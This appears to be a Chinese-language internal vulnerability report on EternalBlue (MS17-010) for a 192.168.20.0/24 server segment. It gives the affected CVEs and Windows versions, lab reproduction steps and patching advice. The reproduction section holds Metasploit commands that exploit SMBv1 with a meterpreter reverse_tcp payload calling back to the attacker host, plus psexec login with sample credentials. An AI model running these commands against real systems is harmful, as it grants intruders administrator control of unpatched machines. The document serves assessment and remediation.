一、漏洞描述
Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
远程 Windows 主机受以下漏洞的影响,由于对某些请求的处理不当,Microsoft Server Message Block 1.0(SMBv1)中存在多个远程执行代码漏洞。未经身份验证的远程攻击者可以通过特制数据包利用这些漏洞来执行任意代码。(CVE-2017-0143,CVE-2017-0144,CVE-2017-0145,CVE-2017-0146,CVE-2017-0148)192.168.20.0/24 服务器网段受此漏洞影响主机 33 台。
二、影响版本
目前已知受影响的Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。
三、复现过程
1、测试环境
攻击机:Linux kali 4.15.0-kali2-amd64 # (IP:192.168.20.143)
目标机:Windows2008R2 (IP:192.168.20.8)
2、主机发现
永恒之蓝漏洞(MS17-010)图形化扫描器
Eternal Blues下载: https://www.freebuf.com/column/139293.html
Eternal Blues下载: http://omerez.com/repository/EternalBlues.exe
3、使用MSF框架提权
使用ms17-010攻击模块,对目标机进行攻击
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.20.8
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.20.143
exploit
攻击成功,已经取得当前服务器的管理员权限。
4、利用SMB账号密码登录
use exploit/windows/smb/psexec
set rhost 192.168.1.1
set smbuser admin
set smbpass Password
exploit
5、漏洞危害
1) 可以非常容易的取得操作系统 administrator 权限,进行服务管理、文件管理;
2) 植入后门、跳板利用,进一步渗透。
四、修复方法
1、使用系统自带的windows update补丁更新服务,更新微软漏洞补丁(慢);
2、使用360 、腾讯管家等工具修复漏洞(建议);
如长期未更新过,可能需要 更新完、重启、再更新、再重启,操作多次 ,因为有些补丁有依赖关系。
3、Windows系统MS17-010补丁下载,下载对应的补丁更新。